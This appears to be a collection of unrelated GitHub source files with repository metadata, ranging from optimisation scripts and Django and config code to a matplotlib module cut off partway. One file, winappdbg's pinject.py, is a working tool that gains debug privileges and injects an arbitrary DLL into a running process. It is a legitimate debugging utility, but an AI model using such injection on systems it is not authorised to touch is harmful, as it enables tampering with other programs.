0928fa1442304f1c65bdf6a271a83d62dfef9e80 | dca0bd2e04dda3801d395c2a6ab2f9d95be79551 | /Python/SmallProject/three_stooges.py | 63eb8eccae942e5a7de0c7bd84bf4411c7b65899 | [] | no_license | A-khateeb/Full-Stack-Development-Path | ab8c86abea2f983fb8e0046a65b99772416c754c | 5a5eaa198367cc95a6b5638e9740f4ad564dec23 | refs/heads/master | 2021-06-01T23:52:04.965494 | 2020-05-01T22:59:20 | 2020-05-01T22:59:20 | 89,286,943 | 2 | 0 | null | 2017-12-22T22:21:52 | 2017-04-24T21:04:07 | Shell | UTF-8 | Python | false | false | 445 | py |
p = 'Hello world'
Stooges = ['Moe', 'Larry', 'Curly']
print (Stooges)
Stooges[2] = 'Shemp'
print (Stooges)
q= Stooges
q[2]= "!"
print (q)
print (Stooges)
Stooges.append('Shemp22')
print(Stooges)
print (len(['a',['b',["c"]]]))
print (len([0,1]))
print (len(["Udacity"]))
list1= [1,2]
list2 =[3,4]
list1.append(list2)
print (len(list1))
list2[1] = 5
print (list1)
'''
spy= [0,0,7]
agent = spy
spy[2]= agent[2]+1
print (spy)
print (agent)
'''
| [
"khateebafeef@gmail.com"
] | khateebafeef@gmail.com |
9902394669267c37d5bd08bb34edc9919258b642 | 48e6a442f35cace8df3a87e1660e4539a084b39e | /cluster_2/90_10/A1_pod100/traffic_matrix_1/A1_1.py | ff9e5eb1a6848b9195753f8fd17b0ca8dfe69ad7 | [] | no_license | LiYan1988/kthjocn | 9056c05e5095a93b47a22c9e027458f410c0d8f3 | 7e5de3b3fb2a48c6dcaf6d7788ab823c5c743845 | refs/heads/master | 2021-01-01T03:56:47.251908 | 2018-06-08T07:27:33 | 2018-06-08T07:27:33 | 77,261,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,740 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 4 15:15:10 2016
@author: li
optimize both throughput and connections
"""
#import sys
#sys.path.insert(0, '/home/li/Dropbox/KTH/numerical_analysis/ILPs')
from sdm import *
from gurobipy import *
import pandas as pd
np.random.seed(2010)

# Problem size and per-stage solver time limits (seconds).
num_cores=5
num_slots=80
mtridx = 1
time_limit_routing = 1800 # 1000
time_limit_sa = 108 # 10800

# Load the traffic matrix CSV into a float ndarray.
filename = 'traffic_matrix_1.csv'
# print filename
tm = []
with open(filename) as f:
    reader = csv.reader(f)
    for idx, row in enumerate(reader):
        row = [float(u) for u in row]
        tm.append(row)
tm = np.array(tm)

# Sweep of beta weights trading off the two objective terms.
betav = np.array([0,
                  1e-5, 2e-5, 4e-5, 8e-5,
                  1e-4, 2e-4, 4e-4, 8e-4,
                  1e-3, 2e-3, 4e-3, 8e-3,
                  1e-2, 2e-2, 4e-2, 8e-2,
                  1e-1, 2e-1, 4e-1, 1, 10])
#betav = np.array([1e-3, 2e-3, 4e-3, 8e-3])

# Per-beta results (heuristic outputs) and upper bounds.
results = {}
obj_results = {}
cnk_results = {}
thp_results = {}
obj_ub = {}
cnk_ub = {}
thp_ub = {}
for beta in betav:
    # Build and solve the routing model, then run every heuristic.
    m = Arch1_decompose(tm, num_slots=num_slots, num_cores=num_cores,
                        alpha=1,beta=beta)
    m.create_model_routing(mipfocus=1,timelimit=time_limit_routing,mipgap=0.05, method=2)
    m.multiple_heuristic()
    # Row 0 = objective, row 1 = connections, row 2 = throughput (one column
    # per heuristic), judging by the variable names below.
    results[beta] = pd.DataFrame(m.heuristics_results)
    obj_results[beta] = results[beta].iloc[0, :]
    cnk_results[beta] = results[beta].iloc[1, :]
    thp_results[beta] = results[beta].iloc[2, :]
    obj_ub[beta] = m.obj_ub_
    cnk_ub[beta] = m.connection_ub_
    thp_ub[beta] = m.throughput_ub_
    # write results
    m.write_result_csv('cnklist_heuristic_%d_%.2e.csv'%(mtridx,beta), m.cnklist_)

obj_results = pd.DataFrame(obj_results)
cnk_results = pd.DataFrame(cnk_results)
thp_results = pd.DataFrame(thp_results)
obj_ub = pd.Series(obj_ub)
cnk_ub = pd.Series(cnk_ub)
thp_ub = pd.Series(thp_ub)

# For each beta, locate the best heuristic and record its metrics alongside
# the upper bounds; 'optimality' is the best-heuristic / upper-bound ratio.
argmax = {betav[i]:obj_results.iloc[:, i].argmax() for i in range(len(betav))}
objmax = {betav[i]:obj_results.iloc[:, i].max() for i in range(len(betav))}
cnk_bh = {betav[i]:cnk_results.loc[argmax[betav[i]], betav[i]]
          for i in range(len(betav))}
thp_bh = {betav[i]:thp_results.loc[argmax[betav[i]], betav[i]]
          for i in range(len(betav))}
obj_final = pd.DataFrame({'ub':obj_ub, 'best_heuristic':objmax,
                          'best_method':argmax, 'cnk_bh':cnk_bh,
                          'thp_bh':thp_bh, 'cnk_ub':cnk_ub, 'thp_ub':thp_ub})
obj_final['optimality'] = obj_final['best_heuristic']/obj_final['ub']
obj_results.to_csv('obj_results_{}.csv'.format(mtridx))
cnk_results.to_csv('cnk_results_{}.csv'.format(mtridx))
thp_results.to_csv('thp_results_{}.csv'.format(mtridx))
obj_final.to_csv('obj_final_{}.csv'.format(mtridx)) | [
"li.yan.ly414@gmail.com"
] | li.yan.ly414@gmail.com |
fe051cda5eea45aaa1903b017a8c2a6d1ee5e14c | d5ee6e6bd1df32a123558e6e4a79c3ad17db19bc | /news/managers.py | 0c53ab2888fd1d4280c4654b067893967f34b36b | [] | no_license | trailhawks/lawrencetrailhawks.com | 06d9f3f0753f0529718a14540858637b5bdfae3d | b250c131cd655e9b43b27834db702e3a853df88b | refs/heads/master | 2021-06-10T11:22:20.435575 | 2016-12-23T08:58:08 | 2016-12-23T08:58:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | import datetime
from django.db.models import Manager
from django.db.models.query import QuerySet
from django.utils import timezone
class NewsQuerySet(QuerySet):
def draft(self):
return self.filter(status__exact=self.model.STATUS_DRAFT)
def public(self):
return self.filter(status__exact=self.model.STATUS_PUBLIC)
def recent(self):
recently = timezone.now() - datetime.timedelta(days=14)
return self.filter(pub_date__gte=recently)
class NewsManager(Manager):
def get_queryset(self):
return NewsQuerySet(self.model, using=self._db)
def draft(self):
return self.get_queryset().draft()
def public(self):
return self.get_queryset().public()
def recent(self):
return self.get_queryset().recent()
| [
"jeff.triplett@gmail.com"
] | jeff.triplett@gmail.com |
0e4a2e05b6a37082a2b8121508a8530e3042edee | 0be484378e45f67a8ab7675498cbc80b51df8461 | /bt5/erp5_ui_test_core/SkinTemplateItem/portal_skins/erp5_ui_test_core/Zuite_setPreference.py | 1eb1be5e08970ec882a4fcc3af5d6feaed8d8519 | [] | no_license | uhml/erp5 | 7ba69b43d0f6c36e4e1b1116351788e75135889d | 41bae8338b238267d60e57a7c7aaa91b32ee0826 | refs/heads/master | 2021-01-14T13:21:27.340016 | 2016-08-18T10:10:56 | 2016-08-18T11:12:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | """Set subversion working copy list and enable preference.
This script is called by Products.ERP5Type.tests.runFunctionalTest to set
subversion working copy paths and conversion server address.
It's not meant to be called by zelenium tests directly.
"""
pref = getattr(context.portal_preferences, "erp5_ui_test_preference", None)
if pref is None:
pref = context.portal_preferences.newContent(id="erp5_ui_test_preference",
portal_type="Preference",
priority=1)
pref.setPreferredSubversionWorkingCopyList(tuple(working_copy_list.split(',')))
pref.setPreferredHtmlStyleUnsavedFormWarning(False)
if pref.getPreferenceState() == 'disabled':
pref.enable()
pref = getattr(context.portal_preferences, "erp5_ui_test_system_preference", None)
if pref is None:
pref = context.portal_preferences.newContent(id="erp5_ui_test_system_preference",
portal_type="System Preference",
priority=1)
pref.setPreferredOoodocServerAddress(conversion_server_hostname)
pref.setPreferredOoodocServerPortNumber(conversion_server_port)
if pref.getPreferenceState() == 'disabled':
pref.enable()
return 'Set Preference Successfully.'
| [
"georgios.dagkakis@nexedi.com"
] | georgios.dagkakis@nexedi.com |
1460e4adc0eaf45d2f00362cbf7115fb97d33bd3 | 507b4ffbdc19614603da9c5c6ea31910fdbbf288 | /interface/labeler_client.py | c5c2eab0889b1d1660528d177857cd573207b2fd | [
"Apache-2.0"
] | permissive | jerryli27/TwinGANFrontendTemporary | 755a0e39f6f92522687cd1bd916549acd2295fd0 | 24f9327d1c50f7b54198a8d74073ca7507d715fb | refs/heads/master | 2020-03-14T12:22:12.950810 | 2018-04-30T15:14:14 | 2018-04-30T15:14:14 | 131,610,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,788 | py | import os
import util_io
import util_misc
import interface_utils
class LabelerClient(object):
    """Serves colored-image / sketch pairs to a labeling UI and tracks progress.

    Finished images are appended to a "done" text file; confirmed
    (image, sketch) pairs go to ``colored_sketch_pair.txt`` next to it.
    """
    def __init__(self,):
        self.image_paths = []         # candidate colored images
        self.sketch_paths = []        # sketch chosen for each image (parallel list)
        self.index = 0                # cursor into image_paths
        self.done_image_paths = set()
        self.done_image_txt_path = ''
        self.sketch_folder = ''

    def set_image_paths(self, image_path, finished_image_txt_path, sketch_folder, exclude_file_start={'e', 'q'}):
        """Load candidate images, previously-finished images, and sketches.

        NOTE(review): ``exclude_file_start`` is a mutable default argument;
        it is only read here, so it is harmless, but unidiomatic.
        """
        if image_path:
            self.image_paths = util_io.get_all_image_paths(image_path)
            # Danbooru specific method to filter out nsfw images.
            self.image_paths = [p for p in self.image_paths if os.path.basename(p)[0] not in exclude_file_start]
            self.sketch_paths = [None for _ in range(len(self.image_paths))]
            self.index = 0
        if finished_image_txt_path:
            self.done_image_txt_path = finished_image_txt_path
            dir = os.path.dirname(finished_image_txt_path)
            self.colored_sketch_pair_txt_path = os.path.join(dir, 'colored_sketch_pair.txt')
            util_io.touch_folder(dir)
            try:
                # A missing/empty done-file raises AssertionError inside
                # util_io; treat that as "nothing finished yet".
                self.done_image_paths = set(util_io.get_all_image_paths(finished_image_txt_path))
            except AssertionError:
                pass
        self.sketch_folder = sketch_folder
        # Keep only images that have a sketch with a matching base name.
        sketches = set([util_misc.get_no_ext_base(p) for p in util_io.get_all_image_paths(sketch_folder)])
        self.image_paths = [p for p in self.image_paths if util_misc.get_no_ext_base(p) in sketches]
        pass

    def get_image_and_id(self):
        """Returns an image encoded in base64."""
        # Advance past anything already marked as done.
        while self.index < len(self.image_paths) and self.image_paths[self.index] in self.done_image_paths:
            self.index += 1
        if self.index == len(self.image_paths):
            # Exhausted: nothing left to label.
            return None, None, None
        image = interface_utils.get_image_encoding(self.image_paths[self.index])
        image_id = os.path.basename(self.image_paths[self.index])
        sketch_image_path = self.get_current_sketch_path()
        sketch = interface_utils.get_image_encoding(sketch_image_path)
        self.sketch_paths[self.index] = sketch_image_path
        return image, sketch, image_id

    def mark_current_as_done(self, is_skip):
        """Persist the current image as finished and advance the cursor.

        When ``is_skip`` is false, the (image, sketch) pair is also appended
        to the confirmed-pairs file.
        """
        with open(self.done_image_txt_path, 'a') as f:
            f.write(self.image_paths[self.index] + '\n')
        if not is_skip:
            with open(self.colored_sketch_pair_txt_path, 'a') as f:
                f.write(self.image_paths[self.index]+'\t' + self.sketch_paths[self.index] + '\n')
        self.done_image_paths.add(self.image_paths[self.index])
        self.index += 1

    def get_current_sketch_path(self):
        """Default sketch path for the image under the cursor."""
        return self.get_sketch_path_for_image_name(self.image_paths[self.index])

    def get_sketch_path_for_image_name(self, image_basename):
        """Map an image name to its sketch: same base name, '.jpg', in sketch_folder."""
        return os.path.join(self.sketch_folder, util_misc.get_no_ext_base(image_basename) + '.jpg')
def set_current_sketch_path(self, new_path):
self.sketch_paths[self.index] = new_path | [
"jerrylijiaming@gmail.com"
] | jerrylijiaming@gmail.com |
7908f51adf44b6200b10a9cc53f37fa511f66531 | f6439b5ed1614fd8db05fa963b47765eae225eb5 | /chrome/browser/extensions/api/push_messaging/DEPS | 8c7d15a911d33d64d98ca56406d3c0a18c5d4e0f | [
"BSD-3-Clause"
] | permissive | aranajhonny/chromium | b8a3c975211e1ea2f15b83647b4d8eb45252f1be | caf5bcb822f79b8997720e589334266551a50a13 | refs/heads/master | 2021-05-11T00:20:34.020261 | 2018-01-21T03:31:45 | 2018-01-21T03:31:45 | 118,301,142 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | include_rules = [
"+components/invalidation",
"+google/cacheinvalidation/types.pb.h",
"+sync/internal_api/public/base/invalidation.h",
"+sync/internal_api/public/base/invalidation_util.h",
]
| [
"jhonnyjosearana@gmail.com"
] | jhonnyjosearana@gmail.com | |
68095f0f7e56c2373879c98c67cf6bbf375b3bf3 | 40dd8330e5f78c4348bbddc2c5acfd59d793dd51 | /projects/medical/2d_image/dermoscopy/isic2017_task1/configs/fcn-unet-s5-d16_unet_1xb16-0.0001-20k_isic2017-task1-512x512.py | 58d0a125d33a1948802b1bbc104095f9fdd28f54 | [
"Apache-2.0"
] | permissive | open-mmlab/mmsegmentation | 0d12092312e2c465ede1fd7dd9847b6f2b37049c | 30a3f94f3e2916e27fa38c67cc3b8c69c1893fe8 | refs/heads/main | 2023-09-04T10:54:52.299711 | 2023-07-24T07:28:21 | 2023-07-24T07:28:21 | 272,133,018 | 6,534 | 2,375 | Apache-2.0 | 2023-09-14T01:22:32 | 2020-06-14T04:32:33 | Python | UTF-8 | Python | false | false | 606 | py | _base_ = [
'mmseg::_base_/models/fcn_unet_s5-d16.py', './isic2017-task1_512x512.py',
'mmseg::_base_/default_runtime.py',
'mmseg::_base_/schedules/schedule_20k.py'
]
# MMSegmentation config fragment, merged over the ``_base_`` configs above.
custom_imports = dict(imports='datasets.isic2017-task1_dataset')
img_scale = (512, 512)
data_preprocessor = dict(size=img_scale)
optimizer = dict(lr=0.0001)
optim_wrapper = dict(optimizer=optimizer)
model = dict(
    data_preprocessor=data_preprocessor,
    decode_head=dict(num_classes=2),  # two-class segmentation head
    auxiliary_head=None,
    test_cfg=dict(mode='whole', _delete_=True))
# Disable visualization backends entirely.
vis_backends = None
visualizer = dict(vis_backends=vis_backends)
| [
"noreply@github.com"
] | open-mmlab.noreply@github.com |
1cc43dc39860b3db828c76db2404cf44159f7da6 | 08ace4e8d7b2fcfa4ff4983e643873fd9c01f6de | /tools/pinject.py | ef71dd321b6524c40bc31b51194ec46cd83e3890 | [] | no_license | 0x90/winappdbg | 87d2e769707ec4ca482af0c946e02f77976314a2 | 5acffe77379836622042385460411ef4dc751d46 | refs/heads/master | 2020-09-26T08:19:10.600353 | 2019-12-06T00:42:52 | 2019-12-06T00:42:52 | 226,215,022 | 6 | 1 | null | 2019-12-06T00:41:16 | 2019-12-06T00:41:15 | null | UTF-8 | Python | false | false | 3,301 | py | #!/bin/env python
# -*- coding: utf-8 -*-
# Acknowledgements:
# Nicolas Economou, for his ptool suite on which this tool is inspired.
# http://tinyurl.com/nicolaseconomou
# Process DLL injector
# Copyright (c) 2009-2018, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
from winappdbg import Process, System, HexInput
def main():
    # NOTE: Python 2 script (print statements throughout).
    print "Process DLL injector"
    print "by Mario Vilas (mvilas at gmail.com)"
    print

    # Exactly two arguments: the target (pid or exe name) and the DLL path.
    if len(sys.argv) != 3:
        script = os.path.basename(sys.argv[0])
        print "Injects a DLL into a running process."
        print " %s <pid> <library.dll>" % script
        print " %s <process.exe> <library.dll>" % script
        return

    # Debug privileges are needed to open other users' processes.
    System.request_debug_privileges()

    # First try the argument as a (hex or decimal) pid; otherwise treat it as
    # an executable name and resolve it to a pid.
    try:
        pid = HexInput.integer(sys.argv[1])
    except Exception:
        s = System()
        s.scan_processes()
        pl = s.find_processes_by_filename(sys.argv[1])
        if not pl:
            print "Process not found: %s" % sys.argv[1]
            return
        if len(pl) > 1:
            # Ambiguous name: list candidates and bail out.
            print "Multiple processes found for %s" % sys.argv[1]
            for p,n in pl:
                print "\t%12d: %s" % (p,n)
            return
        pid = pl[0][0].get_pid()
    print "Using PID %d (0x%x)" % (pid, pid)

    dll = sys.argv[2]
    print "Using DLL %s" % dll

    p = Process(pid)
    # Refuse to inject across bitness boundaries (32 vs 64 bit).
    b = p.get_bits()
    if b != System.bits:
        print (
            "Cannot inject into a %d bit process from a %d bit Python VM!"
            % (b, System.bits)
        )
        return
    p.scan_modules()
    p.inject_dll(dll)

if __name__ == '__main__':
    # Optional psyco JIT speedup, if installed (Python 2 era).
    try:
        import psyco
        psyco.bind(main)
    except ImportError:
        pass
    main()
| [
"mvilas@gmail.com"
] | mvilas@gmail.com |
b634f92f48233fa93f99b45521e9ff384f0ae8cf | abaa004b41f63aa489be12a6e4be8f92ef2ef6d3 | /csvfetch/csvfetch/asgi.py | 10359ee6cee1be3538ccdfe026ad2c360aa606c2 | [] | no_license | vshaladhav97/django_practise_projects | 30dcc8dd909626c1d624d9c5895fc90ad55c79d0 | 83455c50e2ee910f03db47fbe1420d1cbd7eb292 | refs/heads/master | 2023-03-28T14:08:08.244694 | 2021-03-26T03:56:56 | 2021-03-26T03:56:56 | 351,655,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | """
ASGI config for csvfetch project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os

from django.core.asgi import get_asgi_application

# Django must know which settings module to use before the application is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'csvfetch.settings')

application = get_asgi_application()
| [
"adhavv0@gmail.com"
] | adhavv0@gmail.com |
a585f7468c544e99b02615287e02c85f662132d5 | a56a74b362b9263289aad96098bd0f7d798570a2 | /venv/lib/python3.8/site-packages/mpl_toolkits/axisartist/grid_helper_curvelinear.py | 93336b8d648bea6ead4190aa02ed7fd51c938de7 | [
"MIT"
] | permissive | yoonkt200/ml-theory-python | 5812d06841d30e1068f6592b5730a40e87801313 | 7643136230fd4f291b6e3dbf9fa562c3737901a2 | refs/heads/master | 2022-12-21T14:53:21.624453 | 2021-02-02T09:33:07 | 2021-02-02T09:33:07 | 132,319,537 | 13 | 14 | MIT | 2022-12-19T17:23:57 | 2018-05-06T08:17:45 | Python | UTF-8 | Python | false | false | 14,384 | py | """
An experimental support for curvilinear grid.
"""
from itertools import chain
import numpy as np
from matplotlib.path import Path
from matplotlib.transforms import Affine2D, IdentityTransform
from .axislines import AxisArtistHelper, GridHelperBase
from .axis_artist import AxisArtist
from .grid_finder import GridFinder, _deprecate_factor_none
class FixedAxisArtistHelper(AxisArtistHelper.Fixed):
    """
    Helper class for a fixed axis.
    """

    def __init__(self, grid_helper, side, nth_coord_ticks=None):
        """
        nth_coord = along which coordinate value varies.
        nth_coord = 0 -> x axis, nth_coord = 1 -> y axis
        """
        super().__init__(loc=side)

        self.grid_helper = grid_helper
        if nth_coord_ticks is None:
            # Default: ticks vary along the same coordinate as the axis.
            nth_coord_ticks = self.nth_coord
        self.nth_coord_ticks = nth_coord_ticks

        self.side = side
        self._limits_inverted = False

    def update_lim(self, axes):
        self.grid_helper.update_lim(axes)

        # Record whether the data limits along the other coordinate are
        # inverted; get_tick_iterators uses this to flip the side.
        if self.nth_coord == 0:
            xy1, xy2 = axes.get_ylim()
        else:
            xy1, xy2 = axes.get_xlim()

        if xy1 > xy2:
            self._limits_inverted = True
        else:
            self._limits_inverted = False

    def change_tick_coord(self, coord_number=None):
        # With no argument, toggle between coordinate 0 and 1.
        if coord_number is None:
            self.nth_coord_ticks = 1 - self.nth_coord_ticks
        elif coord_number in [0, 1]:
            self.nth_coord_ticks = coord_number
        else:
            raise Exception("wrong coord number")

    def get_tick_transform(self, axes):
        # Ticks are positioned in data coordinates.
        return axes.transData

    def get_tick_iterators(self, axes):
        """tick_loc, tick_angle, tick_label"""
        g = self.grid_helper

        if self._limits_inverted:
            # Inverted limits: take ticks from the geometrically opposite side.
            side = {"left": "right", "right": "left",
                    "top": "bottom", "bottom": "top"}[self.side]
        else:
            side = self.side

        # Ticks along this axis' own coordinate, plus minor ticks from the
        # other coordinate; no minor-label iterator (empty second iterator).
        ti1 = g.get_tick_iterator(self.nth_coord_ticks, side)
        ti2 = g.get_tick_iterator(1-self.nth_coord_ticks, side, minor=True)
        return chain(ti1, ti2), iter([])
class FloatingAxisArtistHelper(AxisArtistHelper.Floating):
    """Helper for an axis artist drawn along a line of constant coordinate
    value inside a curvilinear grid (e.g. a line of constant longitude)."""
    def __init__(self, grid_helper, nth_coord, value, axis_direction=None):
        """
        nth_coord = along which coordinate value varies.
        nth_coord = 0 -> x axis, nth_coord = 1 -> y axis
        """
        # NOTE(review): *axis_direction* is accepted but never used here;
        # callers pass it anyway (see new_floating_axis) — confirm intent.
        super().__init__(nth_coord, value)
        self.value = value
        self.grid_helper = grid_helper
        self._extremes = -np.inf, np.inf
        self._get_line_path = None  # a method that returns a Path.
        self._line_num_points = 100  # number of points to create a line
    def set_extremes(self, e1, e2):
        # Limit the floating axis to the [e1, e2] range of the *other*
        # coordinate; None means unbounded on that end.
        if e1 is None:
            e1 = -np.inf
        if e2 is None:
            e2 = np.inf
        self._extremes = e1, e2
    def update_lim(self, axes):
        # Recompute self.grid_info (tick levels, labels and the polyline of
        # this floating axis) for the current view limits of *axes*.
        self.grid_helper.update_lim(axes)
        x1, x2 = axes.get_xlim()
        y1, y2 = axes.get_ylim()
        grid_finder = self.grid_helper.grid_finder
        extremes = grid_finder.extreme_finder(grid_finder.inv_transform_xy,
                                              x1, y1, x2, y2)
        lon_min, lon_max, lat_min, lat_max = extremes
        e_min, e_max = self._extremes  # ranges of other coordinates
        # Clip the varying coordinate's range by the user-set extremes.
        if self.nth_coord == 0:
            lat_min = max(e_min, lat_min)
            lat_max = min(e_max, lat_max)
        elif self.nth_coord == 1:
            lon_min = max(e_min, lon_min)
            lon_max = min(e_max, lon_max)
        lon_levs, lon_n, lon_factor = \
            grid_finder.grid_locator1(lon_min, lon_max)
        lat_levs, lat_n, lat_factor = \
            grid_finder.grid_locator2(lat_min, lat_max)
        # Sample the axis line: one coordinate fixed at self.value, the
        # other swept over its (clipped) range, then mapped to data coords.
        if self.nth_coord == 0:
            xx0 = np.full(self._line_num_points, self.value, type(self.value))
            yy0 = np.linspace(lat_min, lat_max, self._line_num_points)
            xx, yy = grid_finder.transform_xy(xx0, yy0)
        elif self.nth_coord == 1:
            xx0 = np.linspace(lon_min, lon_max, self._line_num_points)
            yy0 = np.full(self._line_num_points, self.value, type(self.value))
            xx, yy = grid_finder.transform_xy(xx0, yy0)
        self.grid_info = {
            "extremes": (lon_min, lon_max, lat_min, lat_max),
            "lon_info": (lon_levs, lon_n, _deprecate_factor_none(lon_factor)),
            "lat_info": (lat_levs, lat_n, _deprecate_factor_none(lat_factor)),
            "lon_labels": grid_finder.tick_formatter1(
                "bottom", _deprecate_factor_none(lon_factor), lon_levs),
            "lat_labels": grid_finder.tick_formatter2(
                "bottom", _deprecate_factor_none(lat_factor), lat_levs),
            "line_xy": (xx, yy),
        }
    def get_axislabel_transform(self, axes):
        return Affine2D()  # axes.transData
    def get_axislabel_pos_angle(self, axes):
        # Place the axis label at the midpoint of the floating axis; the
        # angle is estimated from a tiny step along the axis direction.
        extremes = self.grid_info["extremes"]
        if self.nth_coord == 0:
            xx0 = self.value
            yy0 = (extremes[2] + extremes[3]) / 2
            dxx = 0
            dyy = abs(extremes[2] - extremes[3]) / 1000
        elif self.nth_coord == 1:
            xx0 = (extremes[0] + extremes[1]) / 2
            yy0 = self.value
            dxx = abs(extremes[0] - extremes[1]) / 1000
            dyy = 0
        grid_finder = self.grid_helper.grid_finder
        (xx1,), (yy1,) = grid_finder.transform_xy([xx0], [yy0])
        data_to_axes = axes.transData - axes.transAxes
        p = data_to_axes.transform([xx1, yy1])
        # Only return a position if the midpoint is inside the axes box.
        if 0 <= p[0] <= 1 and 0 <= p[1] <= 1:
            xx1c, yy1c = axes.transData.transform([xx1, yy1])
            (xx2,), (yy2,) = grid_finder.transform_xy([xx0 + dxx], [yy0 + dyy])
            xx2c, yy2c = axes.transData.transform([xx2, yy2])
            return (xx1c, yy1c), np.rad2deg(np.arctan2(yy2c-yy1c, xx2c-xx1c))
        else:
            return None, None
    def get_tick_transform(self, axes):
        return IdentityTransform()  # axes.transData
    def get_tick_iterators(self, axes):
        """tick_loc, tick_angle, tick_label, (optionally) tick_label"""
        grid_finder = self.grid_helper.grid_finder
        lat_levs, lat_n, lat_factor = self.grid_info["lat_info"]
        lat_levs = np.asarray(lat_levs)
        yy0 = lat_levs / _deprecate_factor_none(lat_factor)
        dy = 0.01 / _deprecate_factor_none(lat_factor)
        lon_levs, lon_n, lon_factor = self.grid_info["lon_info"]
        lon_levs = np.asarray(lon_levs)
        xx0 = lon_levs / _deprecate_factor_none(lon_factor)
        dx = 0.01 / _deprecate_factor_none(lon_factor)
        # set_extremes() replaces None by +/-inf, so the None check below
        # only matters if _extremes was assigned directly.
        if None in self._extremes:
            e0, e1 = self._extremes
        else:
            e0, e1 = sorted(self._extremes)
        if e0 is None:
            e0 = -np.inf
        if e1 is None:
            e1 = np.inf
        # Keep only tick levels inside the user-set extremes; *mask* is
        # reused below to filter the matching labels.
        if self.nth_coord == 0:
            mask = (e0 <= yy0) & (yy0 <= e1)
            #xx0, yy0 = xx0[mask], yy0[mask]
            yy0 = yy0[mask]
        elif self.nth_coord == 1:
            mask = (e0 <= xx0) & (xx0 <= e1)
            #xx0, yy0 = xx0[mask], yy0[mask]
            xx0 = xx0[mask]
        def transform_xy(x, y):
            # curvilinear -> data -> display coordinates.
            x1, y1 = grid_finder.transform_xy(x, y)
            x2y2 = axes.transData.transform(np.array([x1, y1]).transpose())
            x2, y2 = x2y2.transpose()
            return x2, y2
        # find angles
        if self.nth_coord == 0:
            xx0 = np.full_like(yy0, self.value)
            xx1, yy1 = transform_xy(xx0, yy0)
            # Step backwards where a forward step would leave the extremes.
            xx00 = xx0.copy()
            xx00[xx0 + dx > e1] -= dx
            xx1a, yy1a = transform_xy(xx00, yy0)
            xx1b, yy1b = transform_xy(xx00+dx, yy0)
            xx2a, yy2a = transform_xy(xx0, yy0)
            xx2b, yy2b = transform_xy(xx0, yy0+dy)
            labels = self.grid_info["lat_labels"]
            labels = [l for l, m in zip(labels, mask) if m]
        elif self.nth_coord == 1:
            yy0 = np.full_like(xx0, self.value)
            xx1, yy1 = transform_xy(xx0, yy0)
            xx1a, yy1a = transform_xy(xx0, yy0)
            xx1b, yy1b = transform_xy(xx0, yy0+dy)
            xx00 = xx0.copy()
            xx00[xx0 + dx > e1] -= dx
            xx2a, yy2a = transform_xy(xx00, yy0)
            xx2b, yy2b = transform_xy(xx00+dx, yy0)
            labels = self.grid_info["lon_labels"]
            labels = [l for l, m in zip(labels, mask) if m]
        def f1():
            dd = np.arctan2(yy1b-yy1a, xx1b-xx1a)  # angle normal
            dd2 = np.arctan2(yy2b-yy2a, xx2b-xx2a)  # angle tangent
            mm = (yy1b == yy1a) & (xx1b == xx1a)  # mask where dd not defined
            dd[mm] = dd2[mm] + np.pi / 2
            tick_to_axes = self.get_tick_transform(axes) - axes.transAxes
            for x, y, d, d2, lab in zip(xx1, yy1, dd, dd2, labels):
                c2 = tick_to_axes.transform((x, y))
                delta = 0.00001
                # Yield only ticks that fall (almost) inside the axes box.
                if 0-delta <= c2[0] <= 1+delta and 0-delta <= c2[1] <= 1+delta:
                    d1, d2 = np.rad2deg([d, d2])
                    yield [x, y], d1, d2, lab
        return f1(), iter([])
    def get_line_transform(self, axes):
        return axes.transData
    def get_line(self, axes):
        # Return the floating-axis polyline as a Path, delegating to the
        # user-supplied path factory when one is set.
        self.update_lim(axes)
        x, y = self.grid_info["line_xy"]
        if self._get_line_path is None:
            return Path(np.column_stack([x, y]))
        else:
            return self._get_line_path(axes, x, y)
class GridHelperCurveLinear(GridHelperBase):
    """Grid helper that draws a grid defined in a curvilinear coordinate
    system mapped onto the rectilinear axes via *aux_trans*."""
    def __init__(self, aux_trans,
                 extreme_finder=None,
                 grid_locator1=None,
                 grid_locator2=None,
                 tick_formatter1=None,
                 tick_formatter2=None):
        """
        aux_trans : a transform from the source (curved) coordinate to
        target (rectilinear) coordinate. An instance of MPL's Transform
        (inverse transform should be defined) or a tuple of two callable
        objects which defines the transform and its inverse. The callables
        need take two arguments of array of source coordinates and
        should return two target coordinates.
        e.g., ``x2, y2 = trans(x1, y1)``
        """
        super().__init__()
